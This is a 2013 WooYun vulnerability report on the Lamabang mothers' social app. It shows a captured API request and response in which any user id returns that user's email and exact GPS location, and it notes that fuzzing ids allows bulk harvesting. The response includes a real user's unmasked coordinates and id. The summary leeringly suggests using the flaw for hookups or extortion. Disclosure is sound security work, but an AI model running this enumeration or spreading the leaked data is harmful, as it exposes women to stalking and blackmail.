当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-045575
漏洞标题:
辣妈帮手机客户端人妻信息泄漏(联系方式+gps),两性和情感板块各种寂寞的人妻,危害你懂的
相关厂商:
辣妈帮
漏洞作者:
想要减肥的胖纸
提交时间:
2013-12-11 09:33
修复时间:
2014-01-25 09:34
公开时间:
2014-01-25 09:34
漏洞类型:
敏感信息泄露
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-12-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

辣妈帮是基于gps的社交软件,主要对象都是备孕或者怀孕的人妻。午夜的时候各种寂寞的少妇。。。。有人还私信神码直播。当你们直播的时候,你会知道背后有一双眼睛,已经知道了你的联系方式,物理位置,想想就可怕(你懂得)。。。。还有情感板块,神码感觉婚姻不幸福,喜欢上了别人。。。。。嗯。。如果被人恶意利用,敲诈。。后果不堪设想。。。。。。
最猥琐的方式是用该漏洞“约泡”。。。。。。。。。。。。。。

详细说明:

post提交uid查询用户的主页的时候,返回信息内包含了gps email等。

IMG_0025.PNG


IMG_0026.PNG


IMG_0027.PNG

漏洞证明:

注册一个账号 然后随便访问一个板块 点击一个人的头像 抓包。

POST http://open.lmbang.com/user/detail HTTP/1.1
Host: open.lmbang.com
Proxy-Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 53
Connection: close
Cookie: ***********dncac21
User-Agent: 辣妈帮HD 1.7.3 (iPad; iPhone OS 7.0.4; zh_CN)
uid=40***23&client_flag=lmb_ipad&timestamp=1386702488


uid是用户id,结合httpfuzz可以做到批量获取。。。。
返回信息

HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Tue, 10 Dec 2013 19:08:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
{"ret":"0","msg":"ok","timestamp":1386702486,"data":{"userinfo":{"uid":"403**23","nickname":"\u8fa3\u5988806032","email":"125***399@qq.com","nation":"","province":"","city":"","fansnum":"0","idolnum":"1","signature":"","face":"","face200":"","srcface":"","bangs":"58","bbtype":"0","bbbirthday":"0","bbgender":"-1","favorites":"0","scores":"18","isphoto":"1","photos":"0","lv":"1","lvicon":"\/image\/comm\/1.png","daren":"","authtype":"0","topics":"1","deltopics":"0","posts":2,"delposts":"0","comment_visible":"1","jingdu":"113.256513","weidu":"23.170005","is_silence_icon":"0","description":"","authname":"","background":"","jwd_valid":1,"beblacklist":"0"},"isfollow":0,"is_verify":0,"photo_list":[],"photo_count":"0","topic_list":[{"id":"4256131","pid":"0","title":"\u8fdb\u884c\u4e2d\u3002\u3002\u3002","dateline":"1386702013","favorites":"0","comments":"3","thumb":"","picture":"","choice":"0","bid":"8301","uid":"4032823","username":"125****399@qq.com","nickname":"\u8fa3\u5988806032","face":"","bbtype":"0","bbbirthday":"0","product_id":null,"product_price":null,"taobao_url":null,"bangname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"}],"topic_count":"1","comment_list":[{"dateline":"1386702444","content":"\u7ee7\u7eeding","tid":"4256131","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"},{"dateline":"1386702395","content":"\u6211\u4eec\u662f\u592b\u59bb\uff0c\u8981\u60f3\u770b\u7684\u79c1\u4fe1","tid":"4255995","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"},{"dateline":"1386702118","content":"kj\u4e2d\u3002\u3002\u3002","tid":"4256131","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"}],"comment_count":2}}


修复方案:

屏蔽相应回显

版权声明:转载请注明来源 想要减肥的胖纸@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝